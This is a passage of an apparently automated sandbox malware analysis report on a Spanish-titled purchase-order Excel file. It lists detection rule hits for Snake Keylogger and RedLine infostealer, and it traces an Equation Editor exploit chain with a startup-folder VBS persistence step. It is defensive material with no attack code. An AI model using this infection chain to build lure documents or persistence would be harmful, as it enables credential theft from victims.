Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_010637B5 GetLastError,FormatMessageW,

8_2_010637B5

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010510BF AdjustTokenPrivileges,CloseHandle,	8_2_010510BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	8_2_010516C3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013910BF AdjustTokenPrivileges,CloseHandle,	11_2_013910BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_013916C3

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_010651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_010651CD

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00B9A67C

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

5_2_00B8648E

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_00B142A2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR71F4.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Orden de compra 0001-00255454.xlam.xlsx	Virustotal: Detection: 55%
Source: Orden de compra 0001-00255454.xlam.xlsx	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
